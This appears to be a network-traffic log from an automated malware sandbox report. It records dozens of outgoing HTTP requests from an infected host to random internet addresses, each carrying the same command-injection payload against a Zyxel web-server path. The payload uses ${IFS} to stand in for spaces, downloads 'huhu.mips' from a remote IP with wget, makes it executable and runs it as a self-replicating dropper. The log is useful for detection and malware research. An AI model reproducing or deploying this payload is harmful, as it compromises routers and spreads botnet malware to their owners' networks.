                                              Jan 29, 2024 07:04:03.278846979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7709192.168.2.144744870.208.144.250443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.278891087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7710192.168.2.1456028133.166.138.114443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.278927088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7711192.168.2.1434596204.7.128.147443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.278954983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7712192.168.2.143775048.36.71.63443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.278989077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7713192.168.2.143430260.131.104.207443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.279032946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7714192.168.2.1442272123.216.17.220443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.279077053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7715192.168.2.145040697.12.22.172443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.279100895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7716192.168.2.144931612.52.195.46443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.279149055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7717192.168.2.1442304153.77.163.122443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.279191971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7718192.168.2.145902268.102.36.45443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.279218912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7719192.168.2.1452794216.226.150.236443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.279262066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7720192.168.2.145701069.129.244.122443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.279299021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7721192.168.2.145722885.252.4.97443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.279350042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7722192.168.2.1434714104.64.19.95443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.279381037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7723192.168.2.1433552126.61.20.160443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.279416084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7724192.168.2.144925246.156.223.230443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.279474020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7725192.168.2.145969683.122.248.123443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.279490948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7726192.168.2.1458124162.84.74.165443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.279525995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7727192.168.2.1439546126.207.120.203443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.279572964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7728192.168.2.1435750217.125.132.139443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.279608011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7729192.168.2.145901619.139.30.117443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.279627085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7730192.168.2.1437194115.94.241.73443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.279654980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7731192.168.2.144121035.48.109.40443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.279710054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7732192.168.2.146001281.17.76.229443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.279762030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7733192.168.2.1453140189.237.221.147443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.279788017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7734192.168.2.1444220178.59.80.95443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.279829025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7735192.168.2.1456480182.25.75.248443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.279855967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7736192.168.2.143324866.65.92.112443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.279901981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7737192.168.2.1437036217.65.94.211443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.279932976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7738192.168.2.1458086118.166.221.247443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.279985905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7739192.168.2.144692868.84.20.78443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.280025959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7740192.168.2.1453462161.238.128.121443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.280066013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7741192.168.2.144860896.138.131.0443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.280095100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7742192.168.2.144927096.235.53.216443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.280126095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7743192.168.2.144923619.29.196.99443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.280162096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7744192.168.2.143629894.115.27.29443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.280213118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7745192.168.2.1447566155.57.51.235443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.280239105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7746192.168.2.1458544133.37.9.166443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.280272007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7747192.168.2.144498065.68.207.121443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.280322075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7748192.168.2.1450822131.40.115.199443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.280356884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7749192.168.2.1451006101.172.99.57443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.280384064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7750192.168.2.1441164123.8.116.85443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.280424118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7751192.168.2.1438816128.41.29.103443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.280448914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7752192.168.2.1442412221.209.45.69443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.280508995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7753192.168.2.145954452.50.238.74443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.280530930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7754192.168.2.1439676129.151.75.103443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.280581951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7755192.168.2.1438542118.145.242.172443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.280607939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7756192.168.2.1455676167.5.8.107443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.280636072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7757192.168.2.143931414.178.1.129443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.280682087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7758192.168.2.14406049.86.9.80443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.280715942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7759192.168.2.145188696.55.13.81443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.280750036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7760192.168.2.1446900100.237.169.139443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.280790091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7761192.168.2.143884053.66.214.1443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.280817986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7762192.168.2.144300884.53.205.215443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.280848026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7763192.168.2.1449592166.216.111.107443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.280899048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7764192.168.2.1445646177.83.241.77443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.280915022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7765192.168.2.1452112113.16.208.245443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.280963898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7766192.168.2.144631853.125.207.107443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.281006098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7767192.168.2.144253849.7.166.2443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.281039000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7768192.168.2.1436850164.5.31.186443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.281081915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7769192.168.2.1451292198.148.224.28443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.281126022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7770192.168.2.145025023.149.100.0443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.281174898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7771192.168.2.1447582148.201.93.230443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.281194925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7772192.168.2.1454630140.2.121.101443
                                              TimestampBytes transferredDirectionData
